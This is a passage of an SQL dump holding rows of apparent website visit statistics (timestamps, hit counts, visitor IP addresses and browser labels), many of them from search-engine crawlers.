,1,0,0,'138.68.7.254','firefox'),(493588,1585652229,4,4,0,0,'66.249.64.25','chrome'),(493589,1585652554,5,5,0,0,'66.249.64.23','chrome'),(493590,1585652685,1,1,0,0,'66.249.70.33','chrome'),(493591,1585652714,4,4,0,0,'66.249.64.24','chrome'),(493592,1585652717,1,1,0,0,'178.154.200.67','other'),(493593,1585653150,8,8,0,0,'77.120.98.235','other'),(493594,1585653184,1,1,0,0,'66.249.64.25','chrome'),(493595,1585653219,1,1,0,0,'23.104.184.243','chrome'),(493596,1585653239,1,1,0,0,'23.108.50.68','chrome'),(493597,1585653695,2,2,0,0,'8.29.198.26','other'),(493598,1585654050,1,1,0,0,'66.249.70.33','chrome'),(493599,1585654125,1,1,0,0,'66.249.64.24','chrome'),(493600,1585654180,1,1,0,0,'91.124.180.41','chrome'),(493601,1585654412,1,1,0,0,'66.249.64.23','chrome'),(493602,1585654495,1,1,0,0,'109.74.154.72','chrome'),(493603,1585654515,1,0,1,0,'157.55.39.22',''),(493604,1585654528,1,1,0,0,'207.46.13.43','other'),(493605,1585654590,2,2,0,0,'66.249.64.25','chrome'),(493606,1585654798,1,1,0,0,'66.249.70.36','chrome'),(493607,1585655117,1,1,0,0,'66.249.70.38','chrome'),(493608,1585655154,1,1,0,0,'157.55.39.9','other'),(493609,1585655374,3,3,0,0,'157.55.39.249','other'),(493610,1585655593,1,1,0,0,'66.249.64.23','chrome'),(493611,1585655750,2,2,0,0,'66.249.64.24','chrome'),(493612,1585655810,2,2,0,0,'195.123.10.42','chrome'),(493613,1585655848,1,1,0,0,'91.196.178.80','chrome'),(493614,1585655870,4,4,0,0,'207.46.13.43','other'),(493615,1585655917,8,8,0,0,'60.191.38.77','firefox'),(493616,1585655933,2,2,0,0,'66.249.70.36','chrome'),(493617,1585655988,1,1,0,0,'66.249.64.25','chrome'),(493618,1585656509,1,1,0,0,'66.249.70.33','chrome'),(493619,1585656571,2,2,0,0,'94.178.210.247','firefox'),(493620,1585657041,2,2,0,0,'207.46.13.43','other'),(493621,1585657559,2,2,0,0,'66.249.64.25','chrome'),(493622,1585657814,1,1,0,0,'66.249.70.33','chrome'),(493623,1585657832,1,1,0,0,'131.220.6.152','chrome'),(493624,1585657952,3,3,0,0,'66.249.64.24','chrome'),(493625,1585658220,1,1,0,0,'178.154.200.222','other'),(493626,1585658288,1,1,0,0,'95.132.222.52','chrome'),(493627,1585658344,1,1,0,0,'213.180.203.16','other'),(493628,1585658400,1,1,0,0,'91.196.178.145','chrome'),(493629,1585658771,1,1,0,0,'66.249.64.25','chrome'),(493630,1585658774,1,1,0,0,'157.55.39.249','other'),(493631,1585659228,2,2,0,0,'66.249.64.23','chrome'),(493632,1585659377,1,1,0,0,'91.196.178.138','chrome'),(493633,1585659764,1,1,0,0,'66.249.64.25','chrome'),(493634,1585659776,1,1,0,0,'157.55.39.249','other'),(493635,1585659778,1,1,0,0,'66.249.70.36','chrome'),(493636,1585659956,2,2,0,0,'66.249.64.24','chrome'),(493637,1585660026,1,1,0,0,'95.132.222.52','chrome'),(493638,1585660460,1,1,0,0,'157.55.39.9','other'),(493639,1585661566,1,1,0,0,'66.249.70.36','chrome'),(493640,1585661630,3,3,0,0,'66.249.64.23','chrome'),(493641,1585661716,3,3,0,0,'66.249.64.24','chrome'),(493642,1585661763,3,3,0,0,'66.249.64.25','chrome'),(493643,1585662509,1,1,0,0,'91.196.178.80','chrome'),(493644,1585662801,2,2,0,0,'157.55.39.249','other'),(493645,1585662944,1,1,0,0,'66.249.64.23','chrome'),(493646,1585662967,1,1,0,0,'66.249.64.24','chrome'),(493647,1585663475,1,1,0,0,'66.249.64.25','chrome'),(493648,1585663518,1,1,0,0,'66.249.70.36','chrome'),(493649,1585663769,1,1,0,0,'91.196.177.228','chrome'),(493650,1585664101,1,1,0,0,'66.249.64.24','chrome'),(493651,1585664411,2,2,0,0,'66.249.64.23','chrome'),(493652,1585664495,1,1,0,0,'91.196.178.80','chrome'),(493653,1585664531,1,1,0,0,'8.29.198.26','other'),(493654,1585664707,2,2,0,0,'66.249.64.25','chrome'),(493655,1585665001,1,1,0,0,'66.249.70.36','chrome'),(493656,1585665004,1,1,0,0,'66.249.70.33','chrome'),(493657,1585665074,2,2,0,0,'66.249.64.24','chrome'),(493658,1585665294,1,1,0,0,'8.29.198.25','other'),(493659,1585665340,1,1,0,0,'66.249.64.23','chrome'),(493660,1585665504,1,1,0,0,'66.249.70.38','chrome'),(493661,1585665830,1,1,0,0,'157.55.39.9','other'),(493662,1585666571,1,1,0,0,'66.249.64.23','chrome'),(493663,1585666576,2,2,0,0,'66.249.64.24','chrome'),(493664,1585667117,1,1,0,0,'66.249.64.25','chrome'),(493665,1585667419,1,1,0,0,'207.46.13.43','other'),(493666,1585667559,1,1,0,0,'157.55.39.249','other'),(493667,1585667578,2,2,0,0,'66.249.64.23','chrome'),(493668,1585668084,1,1,0,0,'91.196.178.92','chrome'),(493669,1585668354,1,1,0,0,'157.55.39.22','other'),(493670,1585668379,1,1,0,0,'66.249.70.33','chrome'),(493671,1585668804,1,1,0,0,'66.249.64.25','chrome'),(493672,1585668816,2,2,0,0,'66.249.64.24','chrome'),(493673,1585669308,2,2,0,0,'157.55.39.249','other'),(493674,1585669525,2,2,0,0,'66.249.64.23','chrome'),(493675,1585669945,1,1,0,0,'66.249.64.25','chrome'),(493676,1585670032,1,1,0,0,'157.55.39.22','other'),(493677,1585670711,2,2,0,0,'66.249.64.24','chrome'),(493678,1585671207,2,2,0,0,'66.249.64.25','chrome'),(493679,1585672265,1,1,0,0,'66.249.64.25','chrome'),(493680,1585672385,1,1,0,0,'37.52.115.13','chrome'),(493681,1585672561,2,2,0,0,'157.55.39.249','other'),(493682,1585672610,1,1,0,0,'66.249.64.23','chrome'),(493683,1585672873,5,5,0,0,'66.249.64.24','chrome'),(493684,1585672920,1,1,0,0,'157.55.39.9','other'),(493685,1585673256,4,4,0,0,'66.249.64.25','chrome'),(493686,1585673711,1,1,0,0,'66.249.70.38','chrome'),(493687,1585673829,1,1,0,0,'66.249.64.23','chrome'),(493688,1585674135,1,1,0,0,'66.249.64.24','chrome'),(493689,1585675365,1,1,0,0,'8.29.198.27','other'),(493690,1585675851,2,2,0,0,'66.249.64.25','chrome'),(493691,1585676122,1,1,0,0,'8.29.198.25','other'),(493692,1585676143,2,2,0,0,'66.249.64.23','chrome'),(493693,1585676928,2,2,0,0,'66.249.64.24','chrome'),(493694,1585677114,1,1,0,0,'66.249.64.25','chrome'),(493695,1585677206,2,2,0,0,'157.55.39.9','other'),(493696,1585677275,8,8,0,0,'77.120.98.235','other'),(493697,1585677467,2,2,0,0,'207.46.13.43','other'),(493698,1585678001,1,1,0,0,'66.249.64.23','chrome'),(493699,1585678042,1,1,0,0,'66.249.64.25','chrome'),(493700,1585678210,1,1,0,0,'66.249.70.38','chrome'),(493701,1585678576,1,1,0,0,'157.55.39.22','other'),(493702,1585678959,1,1,0,0,'157.55.39.249','other'),(493703,1585679043,2,2,0,0,'77.74.177.114','chrome'),(493704,1585679195,1,1,0,0,'66.249.70.33','chrome'),(493705,1585679222,3,3,0,0,'66.249.64.24','chrome'),(493706,1585679527,2,2,0,0,'157.55.39.9','other'),(493707,1585680310,2,2,0,0,'66.249.64.24','chrome'),(493708,1585681661,1,0,1,0,'157.55.39.22',''),(493709,1585681839,1,1,0,0,'95.142.118.19','other'),(493710,1585681934,1,1,0,0,'66.249.70.33','chrome'),(493711,1585681976,1,1,0,0,'66.249.64.25','chrome'),(493712,1585682271,1,1,0,0,'66.249.64.23','chrome'),(493713,1585682464,1,1,0,0,'157.55.39.22','other'),(493714,1585682574,1,1,0,0,'110.229.221.36','firefox'),(493715,1585682650,1,1,0,0,'2.47.39.215','other'),(493716,1585682678,1,1,0,0,'91.196.178.187','chrome'),(493717,1585682745,1,1,0,0,'173.252.111.20','other'),(493718,1585682961,1,1,0,0,'66.249.64.25','chrome'),(493719,1585683170,1,1,0,0,'157.55.39.9','other'),(493720,1585683579,1,1,0,0,'66.249.64.23','chrome'),(493721,1585683805,1,1,0,0,'66.249.70.33','chrome'),(493722,1585683934,1,1,0,0,'173.252.111.19','other'),(493723,1585683935,1,1,0,0,'173.252.111.2','other'),(493724,1585683951,1,1,0,0,'66.249.70.36','chrome'),(493725,1585684429,2,2,0,0,'157.55.39.249','other'),(493726,1585685055,1,1,0,0,'66.249.64.25','chrome'),(493727,1585685235,2,2,0,0,'66.249.64.24','chrome'),(493728,1585685805,1,1,0,0,'157.55.39.9','other'),(493729,1585685969,1,1,0,0,'66.249.64.23','chrome'),(493730,1585686201,1,1,0,0,'8.29.198.27','other'),(493731,1585686297,1,1,0,0,'66.249.64.25','chrome'),(493732,1585686870,1,1,0,0,'66.249.64.24','chrome'),(493733,1585686953,1,1,0,0,'8.29.198.26','other'),(493734,1585687556,1,1,0,0,'157.55.39.249','other'),(493735,1585688159,2,2,0,0,'66.249.64.25','chrome'),(493736,1585688344,2,2,0,0,'66.249.64.23','chrome'),(493737,1585688352,1,1,0,0,'157.55.39.22','other'),(493738,1585688454,1,1,0,0,'173.252.111.3','other'),(493739,1585688534,1,1,0,0,'66.249.70.38','chrome'),(493740,1585688656,1,1,0,0,'157.55.39.249','other'),(493741,1585689115,1,1,0,0,'66.249.64.25','chrome'),(493742,1585689812,1,1,0,0,'66.249.64.23','chrome'),(493743,1585689981,1,1,0,0,'66.249.70.36','chrome'),(493744,1585690294,1,1,0,0,'157.55.39.9','other'),(493745,1585690536,1,1,0,0,'66.249.64.25','chrome'),(493746,1585690735,1,1,0,0,'207.46.13.168','other'),(493747,1585691422,1,1,0,0,'157.55.39.9','other'),(493748,1585691733,2,2,0,0,'207.46.13.168','other'),(493749,1585691943,1,1,0,0,'157.55.39.249','other'),(493750,1585691953,1,1,0,0,'31.43.13.170','chrome'),(493751,1585692098,1,1,0,0,'66.249.64.23','chrome'),(493752,1585692262,2,1,1,0,'66.249.64.25',''),(493753,1585692295,1,1,0,0,'66.249.70.33','chrome'),(493754,1585693782,3,3,0,0,'66.249.64.24','chrome'),(493755,1585694752,1,1,0,0,'66.249.64.23','chrome'),(493756,1585694897,1,1,0,0,'157.55.39.22','other'),(493757,1585695066,3,3,0,0,'66.249.64.24','chrome'),(493758,1585695101,1,1,0,0,'157.55.39.9','other'),(493759,1585695269,1,1,0,0,'66.249.64.25','chrome'),(493760,1585695306,2,2,0,0,'66.249.70.33','chrome'),(493761,1585695578,1,1,0,0,'157.55.39.249','other'),(493762,1585695582,2,2,0,0,'207.46.13.168','other'),(493763,1585695729,2,2,0,0,'66.249.64.23','chrome'),(493764,1585695946,1,1,0,0,'66.249.70.38','chrome'),(493765,1585696590,1,1,0,0,'157.55.39.22','other'),(493766,1585697027,1,1,0,0,'8.29.198.26','other'),(493767,1585697511,1,1,0,0,'66.249.64.23','chrome'),(493768,1585697782,1,1,0,0,'8.29.198.27','other'),(493769,1585698256,1,1,0,0,'157.55.39.9','other'),(493770,1585698692,1,1,0,0,'66.249.64.23','chrome'),(493771,1585698905,1,1,0,0,'62.205.134.182','other'),(493772,1585699012,2,2,0,0,'66.249.64.24','chrome'),(493773,1585699131,2,2,0,0,'157.55.39.22','other'),(493774,1585699187,1,1,0,0,'66.249.70.38','chrome'),(493775,1585699269,2,2,0,0,'66.249.64.25','chrome'),(493776,1585699336,8,8,0,0,'77.120.98.235','other'),(493777,1585700168,1,1,0,0,'157.55.39.9','other'),(493778,1585700308,3,3,0,0,'66.249.64.25','chrome'),(493779,1585701620,1,0,1,0,'66.249.64.24',''),(493780,1585701650,1,1,0,0,'66.249.64.23','chrome'),(493781,1585701835,1,1,0,0,'213.180.203.146','other'),(493782,1585702313,2,2,0,0,'66.249.64.25','chrome'),(493783,1585702581,1,1,0,0,'66.249.64.24','chrome'),(493784,1585702803,1,1,0,0,'66.249.70.36','chrome'),(493785,1585703212,1,1,0,0,'66.249.64.23','chrome'),(493786,1585703673,1,1,0,0,'66.249.70.33','chrome'),(493787,1585703903,1,1,0,0,'66.249.64.25','chrome'),(493788,1585703942,2,2,0,0,'157.55.39.249','other'),(493789,1585704180,1,1,0,0,'66.249.64.24','chrome'),(493790,1585704469,1,1,0,0,'213.180.203.122','other'),(493791,1585705022,1,1,0,0,'66.249.64.25','chrome'),(493792,1585705112,1,1,0,0,'66.249.64.23','chrome'),(493793,1585705569,2,2,0,0,'178.137.81.181','chrome'),(493794,1585705977,1,1,0,0,'157.55.39.249','other'),(493795,1585706472,1,1,0,0,'66.249.70.33','chrome'),(493796,1585706547,1,1,0,0,'66.249.64.25','chrome'),(493797,1585706589,2,2,0,0,'66.249.64.23','chrome'),(493798,1585707688,2,1,1,0,'66.249.64.23',''),(493799,1585707690,1,1,0,0,'66.249.70.38','chrome'),(493800,1585707864,1,1,0,0,'8.29.198.26','other'),(493801,1585707876,1,1,0,0,'178.154.200.114','other'),(493802,1585708009,1,1,0,0,'213.180.203.6','other'),(493803,1585708353,1,1,0,0,'66.249.64.23','chrome'),(493804,1585708395,3,3,0,0,'66.249.64.24','chrome'),(493805,1585708482,1,1,0,0,'213.180.203.38','other'),(493806,1585708537,2,2,0,0,'66.249.64.25','chrome'),(493807,1585708603,1,1,0,0,'95.216.96.243','other'),(493808,1585708608,1,1,0,0,'8.29.198.27','other'),(493809,1585708646,1,1,0,0,'157.55.39.22','other'),(493810,1585708954,1,1,0,0,'178.154.200.114','other'),(493811,1585709552,3,2,1,0,'66.249.64.24',''),(493812,1585709721,3,3,0,0,'66.249.64.23','chrome'),(493813,1585710426,1,1,0,0,'213.180.203.148','other'),(493814,1585710483,1,1,0,0,'66.249.64.24','chrome'),(493815,1585710592,1,1,0,0,'66.249.70.38','chrome'),(493816,1585710615,1,1,0,0,'66.249.64.25','chrome'),(493817,1585711246,3,3,0,0,'66.249.64.23','chrome'),(493818,1585711376,1,1,0,0,'47.57.24.74','chrome'),(493819,1585711740,3,3,0,0,'66.249.64.24','chrome'),(493820,1585712611,1,1,0,0,'207.46.13.168','other'),(493821,1585712619,1,1,0,0,'157.55.39.22','other'),(493822,1585712813,4,4,0,0,'66.249.64.24','chrome'),(493823,1585712860,1,1,0,0,'209.17.96.242','other'),(493824,1585713086,4,4,0,0,'66.249.64.23','chrome'),(493825,1585713405,2,2,0,0,'66.249.64.25','chrome'),(493826,1585713528,1,1,0,0,'66.249.70.36','chrome'),(493827,1585713688,1,1,0,0,'213.180.203.16','other'),(493828,1585714766,4,4,0,0,'66.249.64.24','chrome'),(493829,1585714796,1,1,0,0,'178.154.200.91','other'),(493830,1585714829,4,4,0,0,'66.249.64.23','chrome'),(493831,1585715119,1,1,0,0,'207.46.13.168','other'),(493832,1585715674,1,1,0,0,'66.249.64.25','chrome'),(493833,1585715791,1,1,0,0,'66.249.64.24','chrome'),(493834,1585715983,1,1,0,0,'62.205.134.182','other'),(493835,1585716169,1,0,1,0,'207.46.13.168',''),(493836,1585716182,1,1,0,0,'66.249.64.23','chrome'),(493837,1585716803,2,2,0,0,'66.249.70.33','chrome'),(493838,1585716984,2,2,0,0,'66.249.64.25','chrome'),(493839,1585717161,1,1,0,0,'207.46.13.168','other'),(493840,1585717273,1,1,0,0,'66.249.64.24','chrome'),(493841,1585717805,2,2,0,0,'66.249.70.33','chrome'),(493842,1585718176,1,1,0,0,'157.55.39.22','other'),(493843,1585718581,2,2,0,0,'66.249.64.24','chrome'),(493844,1585718637,3,3,0,0,'66.249.64.23','chrome'),(493845,1585718700,1,1,0,0,'8.29.198.27','other'),(493846,1585718743,1,1,0,0,'66.249.70.38','chrome'),(493847,1585718910,2,2,0,0,'66.249.70.36','chrome'),(493848,1585719019,1,1,0,0,'157.55.39.249','other'),(493849,1585719097,2,2,0,0,'66.249.64.25','chrome'),(493850,1585719430,1,1,0,0,'8.29.198.26','other'),(493851,1585719992,1,1,0,0,'66.249.64.24','chrome'),(493852,1585720160,1,1,0,0,'157.55.39.22','other'),(493853,1585720208,8,8,0,0,'77.120.98.235','other'),(493854,1585720660,2,2,0,0,'66.249.64.25','chrome'),(493855,1585720716,1,1,0,0,'66.249.70.33','chrome'),(493856,1585721469,1,1,0,0,'66.249.64.24','chrome'),(493857,1585721986,2,2,0,0,'109.86.136.22','chrome'),(493858,1585722005,2,2,0,0,'66.249.64.23','chrome'),(493859,1585722192,1,1,0,0,'213.180.203.146','other'),(493860,1585722305,3,3,0,0,'66.249.64.25','chrome'),(493861,1585722333,1,1,0,0,'157.55.39.22','other'),(493862,1585723022,1,1,0,0,'109.86.136.22','chrome'),(493863,1585723240,1,1,0,0,'66.249.64.24','chrome'),(493864,1585723294,1,1,0,0,'66.249.64.23','chrome'),(493865,1585724119,2,2,0,0,'66.249.70.33','chrome'),(493866,1585724161,2,2,0,0,'66.249.64.25','chrome'),(493867,1585724658,1,1,0,0,'66.249.64.23','chrome'),(493868,1585724828,1,1,0,0,'213.180.203.101','other'),(493869,1585725854,1,1,0,0,'178.154.200.196','other'),(493870,1585727181,2,2,0,0,'157.55.39.22','other'),(493871,1585727363,2,2,0,0,'157.55.39.249','other'),(493872,1585728426,1,1,0,0,'66.249.64.24','chrome'),(493873,1585729475,8,8,0,0,'77.120.98.235','other'),(493874,1585729526,2,2,0,0,'8.29.198.25','other'),(493875,1585729571,1,1,0,0,'173.252.111.21','other'),(493876,1585729612,1,1,0,0,'178.154.200.87','other'),(493877,1585730931,1,1,0,0,'66.249.70.38','chrome'),(493878,1585731616,1,1,0,0,'91.196.178.166','chrome'),(493879,1585731703,2,2,0,0,'66.249.64.25','chrome'),(493880,1585731854,1,1,0,0,'66.249.70.38','chrome'),(493881,1585732041,1,1,0,0,'213.180.203.16','other'),(493882,1585733065,1,1,0,0,'207.46.13.168','other'),(493883,1585733320,1,1,0,0,'66.249.64.25','chrome'),(493884,1585733413,1,1,0,0,'213.180.203.70','other'),(493885,1585734498,2,2,0,0,'91.196.178.170','chrome'),(493886,1585734541,1,1,0,0,'178.154.200.222','other'),(493887,1585734686,1,1,0,0,'149.154.161.7','other'),(493888,1585734700,1,1,0,0,'188.163.17.139','chrome'),(493889,1585735341,1,1,0,0,'37.52.78.6','chrome'),(493890,1585735923,1,1,0,0,'91.196.178.170','chrome'),(493891,1585736325,1,1,0,0,'18.216.144.134','chrome'),(493892,1585736894,1,1,0,0,'66.249.64.24','chrome'),(493893,1585737991,1,1,0,0,'207.46.13.168','other'),(493894,1585738842,1,1,0,0,'157.55.39.22','other'),(493895,1585739151,2,2,0,0,'95.213.141.126','opera'),(493896,1585739326,1,0,1,0,'66.249.64.25',''),(493897,1585739927,1,1,0,0,'157.55.39.249','other'),(493898,1585740255,1,1,0,0,'13.66.139.0','other'),(493899,1585740358,1,1,0,0,'8.29.198.26','other'),(493900,1585740659,1,1,0,0,'78.111.187.242','chrome'),(493901,1585740727,1,1,0,0,'207.46.13.168','other'),(493902,1585740806,2,2,0,0,'178.154.200.222','other'),(493903,1585741081,1,1,0,0,'8.29.198.27','other'),(493904,1585741374,1,1,0,0,'91.196.178.166','chrome'),(493905,1585741615,1,1,0,0,'109.74.154.72','chrome'),(493906,1585742172,1,1,0,0,'91.196.178.68','chrome'),(493907,1585742257,8,8,0,0,'77.120.98.235','other'),(493908,1585742873,2,2,0,0,'66.249.64.24','chrome'),(493909,1585743208,1,1,0,0,'66.249.64.23','chrome'),(493910,1585743393,1,1,0,0,'91.196.178.68','chrome'),(493911,1585743470,1,1,0,0,'178.154.200.220','other'),(493912,1585743816,1,1,0,0,'91.124.180.200','chrome'),(493913,1585744271,1,1,0,0,'91.196.177.46','chrome'),(493914,1585744330,1,1,0,0,'157.55.39.22','other'),(493915,1585744467,2,2,0,0,'207.46.13.168','other'),(493916,1585744730,1,1,0,0,'131.220.6.152','chrome'),(493917,1585746718,1,1,0,0,'157.55.39.249','other'),(493918,1585748489,1,1,0,0,'157.55.39.249','other'),(493919,1585748686,1,1,0,0,'91.209.11.236','other'),(493920,1585749468,2,2,0,0,'178.154.200.222','other'),(493921,1585749659,1,1,0,0,'207.46.13.168','other'),(493922,1585750949,1,1,0,0,'37.73.167.83','chrome'),(493923,1585751055,1,1,0,0,'185.15.56.22','other'),(493924,1585751160,1,1,0,0,'178.154.200.220','other'),(493925,1585751189,2,2,0,0,'8.29.198.26','other'),(493926,1585751565,1,1,0,0,'157.55.39.22','other'),(493927,1585752295,1,0,1,0,'207.46.13.168',''),(493928,1585753712,1,1,0,0,'66.249.64.25','chrome'),(493929,1585754246,1,1,0,0,'157.55.39.249','other'),(493930,1585754571,1,1,0,0,'91.196.178.70','firefox'),(493931,1585754696,1,1,0,0,'178.154.200.112','other'),(493932,1585754770,8,8,0,0,'77.120.98.235','other'),(493933,1585755286,2,2,0,0,'66.249.64.25','chrome'),(493934,1585756318,1,1,0,0,'66.249.64.23','chrome'),(493935,1585756551,1,0,1,0,'207.46.13.168',''),(493936,1585758247,1,1,0,0,'51.15.78.133','chrome'),(493937,1585758408,1,1,0,0,'66.249.64.24','chrome'),(493938,1585758624,1,1,0,0,'91.196.178.176','chrome'),(493939,1585758626,1,1,0,0,'213.180.203.16','other'),(493940,1585758874,1,1,0,0,'157.55.39.249','other'),(493941,1585759828,2,2,0,0,'173.252.111.3','other'),(493942,1585759829,1,1,0,0,'173.252.111.6','other'),(493943,1585759987,1,1,0,0,'178.154.200.222','other'),(493944,1585760037,2,2,0,0,'91.209.11.236','other'),(493945,1585761348,1,1,0,0,'178.154.200.222','other'),(493946,1585761688,1,1,0,0,'91.196.178.92','firefox'),(493947,1585761712,1,1,0,0,'66.249.64.25','chrome'),(493948,1585761841,1,1,0,0,'66.249.70.33','chrome'),(493949,1585762017,1,1,0,0,'8.29.198.25','other'),(493950,1585762731,1,1,0,0,'8.29.198.27','other'),(493951,1585762925,1,1,0,0,'66.249.70.38','chrome'),(493952,1585764448,2,2,0,0,'207.46.13.168','other'),(493953,1585765391,1,1,0,0,'91.209.11.236','other'),(493954,1585765563,1,1,0,0,'212.102.45.98','msie'),(493955,1585766104,1,1,0,0,'91.196.178.27','chrome'),(493956,1585766149,1,1,0,0,'178.154.200.222','other'),(493957,1585766158,1,1,0,0,'207.46.13.168','other'),(493958,1585766659,1,1,0,0,'91.209.11.236','other'),(493959,1585767181,1,1,0,0,'66.249.64.23','chrome'),(493960,1585767250,2,2,0,0,'207.46.13.168','other'),(493961,1585767796,1,1,0,0,'91.209.11.236','other'),(493962,1585768306,2,2,0,0,'207.46.13.168','other'),(493963,1585770062,1,1,0,0,'91.209.11.236','other'),(493964,1585770499,1,1,0,0,'66.249.64.25','chrome'),(493965,1585770822,1,1,0,0,'157.55.39.249','other'),(493966,1585771190,1,1,0,0,'207.46.13.168','other'),(493967,1585771205,1,1,0,0,'91.209.11.236','other'),(493968,1585771230,1,1,0,0,'66.249.64.23','chrome'),(493969,1585771802,1,1,0,0,'157.55.39.249','other'),(493970,1585772229,1,1,0,0,'66.249.64.23','chrome'),(493971,1585772441,1,1,0,0,'91.209.11.236','other'),(493972,1585772617,1,1,0,0,'157.55.39.22','other'),(493973,1585772845,1,0,1,0,'66.249.64.24',''),(493974,1585772851,1,1,0,0,'8.29.198.25','other'),(493975,1585773488,1,1,0,0,'178.154.200.222','other'),(493976,1585773532,1,1,0,0,'91.209.11.236','other'),(493977,1585773553,1,1,0,0,'8.29.198.27','other'),(493978,1585774263,2,2,0,0,'157.55.39.249','other'),(493979,1585774698,1,1,0,0,'91.209.11.236','other'),(493980,1585774878,8,8,0,0,'77.120.98.235','other'),(493981,1585774913,1,1,0,0,'66.249.64.24','chrome'),(493982,1585775926,1,1,0,0,'91.209.11.236','other'),(493983,1585776244,1,1,0,0,'213.180.203.16','other'),(493984,1585776598,1,1,0,0,'157.55.39.22','other'),(493985,1585776787,1,1,0,0,'66.249.64.24','chrome'),(493986,1585776951,1,1,0,0,'178.154.200.222','other'),(493987,1585777129,1,1,0,0,'91.209.11.236','other'),(493988,1585777691,1,0,1,0,'66.249.64.25',''),(493989,1585778037,1,1,0,0,'207.46.13.168','other'),(493990,1585778092,1,1,0,0,'128.71.30.59','chrome'),(493991,1585778118,1,1,0,0,'157.55.39.249','other'),(493992,1585778449,1,1,0,0,'91.209.11.236','other'),(493993,1585778817,1,1,0,0,'92.113.190.144','chrome'),(493994,1585779183,1,1,0,0,'157.55.39.249','other'),(493995,1585779310,1,1,0,0,'178.154.200.222','other'),(493996,1585779435,1,1,0,0,'66.249.64.25','chrome'),(493997,1585779439,1,1,0,0,'66.249.64.23','chrome'),(493998,1585779654,1,1,0,0,'91.209.11.236','other'),(493999,1585780921,1,1,0,0,'91.209.11.236','other'),(494000,1585782226,1,1,0,0,'91.209.11.236','other'),(494001,1585782714,1,1,0,0,'157.55.39.249','other'),(494002,1585782789,1,1,0,0,'66.249.64.24','chrome'),(494003,1585783648,1,1,0,0,'91.209.11.236','other'),(494004,1585783687,1,1,0,0,'8.29.198.26','other'),(494005,1585784174,1,1,0,0,'178.154.200.222','other'),(494006,1585784375,1,1,0,0,'8.29.198.25','other'),(494007,1585784620,1,1,0,0,'85.215.88.230','other'),(494008,1585784961,1,1,0,0,'91.209.11.236','other'),(494009,1585785306,1,1,0,0,'62.205.134.182','other'),(494010,1585785332,1,1,0,0,'157.55.39.22','other'),(494011,1585785480,1,1,0,0,'157.55.39.249','other'),(494012,1585786483,1,1,0,0,'91.209.11.236','other'),(494013,1585787745,2,2,0,0,'207.46.13.168','other'),(494014,1585787822,1,1,0,0,'91.209.11.236','other'),(494015,1585787861,1,1,0,0,'157.55.39.249','other'),(494016,1585789132,1,1,0,0,'66.249.64.23','chrome'),(494017,1585789406,1,1,0,0,'91.209.11.236','other'),(494018,1585792348,1,1,0,0,'91.209.11.236','other'),(494019,1585793838,1,1,0,0,'207.46.13.168','other'),(494020,1585793940,1,1,0,0,'91.209.11.236','other'),(494021,1585794438,8,8,0,0,'77.120.98.235','other'),(494022,1585794519,1,1,0,0,'8.29.198.26','other'),(494023,1585795201,1,1,0,0,'8.29.198.25','other'),(494024,1585795494,1,1,0,0,'91.209.11.236','other'),(494025,1585796614,1,0,1,0,'66.249.64.25',''),(494026,1585796991,1,1,0,0,'91.209.11.236','other'),(494027,1585797196,2,2,0,0,'157.55.39.249','other'),(494028,1585797468,1,1,0,0,'66.249.64.24','chrome'),(494029,1585797686,1,1,0,0,'66.249.64.25','chrome'),(494030,1585798395,1,1,0,0,'91.209.11.236','other'),(494031,1585799216,1,1,0,0,'66.249.64.23','chrome'),(494032,1585799767,1,1,0,0,'91.209.11.236','other'),(494033,1585801030,1,1,0,0,'91.209.11.236','other'),(494034,1585801301,2,2,0,0,'91.196.178.122','chrome'),(494035,1585802252,1,1,0,0,'91.209.11.236','other'),(494036,1585802382,1,1,0,0,'62.205.134.182','other'),(494037,1585802707,1,0,1,0,'157.55.39.249',''),(494038,1585803511,1,1,0,0,'91.209.11.236','other'),(494039,1585803863,1,1,0,0,'207.46.13.168','other'),(494040,1585804430,2,2,0,0,'134.122.81.145','other'),(494041,1585804676,1,1,0,0,'91.209.11.236','other'),(494042,1585805349,2,2,0,0,'8.29.198.26','other'),(494043,1585805527,1,1,0,0,'188.167.251.204','chrome'),(494044,1585805802,1,1,0,0,'91.209.11.236','other'),(494045,1585806441,2,2,0,0,'66.249.64.23','chrome'),(494046,1585806865,1,1,0,0,'40.77.189.134','other'),(494047,1585807032,1,1,0,0,'91.209.11.236','other'),(494048,1585807684,1,1,0,0,'66.249.64.23','chrome'),(494049,1585807980,1,1,0,0,'66.249.70.33','chrome'),(494050,1585808973,2,2,0,0,'66.249.64.25','chrome'),(494051,1585809388,1,1,0,0,'212.90.60.88','chrome'),(494052,1585809392,1,1,0,0,'91.209.11.236','other'),(494053,1585809827,1,1,0,0,'207.46.13.168','other'),(494054,1585810339,1,1,0,0,'91.196.177.46','chrome'),(494055,1585810714,1,1,0,0,'91.209.11.236','other'),(494056,1585810818,1,1,0,0,'66.249.64.25','chrome'),(494057,1585811771,1,1,0,0,'91.196.177.46','chrome'),(494058,1585811961,1,1,0,0,'91.209.11.236','other'),(494059,1585812024,1,1,0,0,'66.249.64.24','chrome'),(494060,1585812029,1,1,0,0,'207.46.13.168','other'),(494061,1585812033,2,2,0,0,'157.55.39.22','other'),(494062,1585812820,1,1,0,0,'91.196.177.46','chrome'),(494063,1585812955,5,5,0,0,'173.252.111.24','other'),(494064,1585812963,2,2,0,0,'173.252.111.9','other'),(494065,1585812967,1,1,0,0,'173.252.111.21','other'),(494066,1585812971,1,1,0,0,'173.252.111.10','other'),(494068,1585813051,1,1,0,0,'207.46.13.79','other'),(494069,1585813287,2,2,0,0,'66.249.64.23','chrome'),(494070,1585813349,1,1,0,0,'91.209.11.236','other'),(494071,1585813705,1,1,0,0,'66.249.70.33','chrome'),(494072,1585813782,1,1,0,0,'66.249.64.24','chrome'),(494073,1585814106,8,8,0,0,'77.120.98.235','other'),(494074,1585814634,1,1,0,0,'91.209.11.236','other'),(494075,1585815766,1,1,0,0,'162.213.37.232','chrome'),(494076,1585815898,2,2,0,0,'66.249.64.24','chrome'),(494077,1585816175,1,1,0,0,'8.29.198.27','other'),(494078,1585816645,1,1,0,0,'66.249.70.33','chrome'),(494079,1585816854,1,1,0,0,'8.29.198.26','other'),(494080,1585817101,1,1,0,0,'91.209.11.236','other'),(494081,1585817576,1,1,0,0,'207.46.13.79','other'),(494082,1585818011,2,2,0,0,'91.209.11.236','other'),(494083,1585818812,1,1,0,0,'91.196.178.166','chrome'),(494084,1585818996,3,3,0,0,'66.249.64.23','chrome'),(494085,1585819278,2,2,0,0,'66.249.64.25','chrome'),(494086,1585819347,1,1,0,0,'66.249.64.24','chrome'),(494087,1585819420,1,1,0,0,'178.154.171.134','other'),(494088,1585819421,1,1,0,0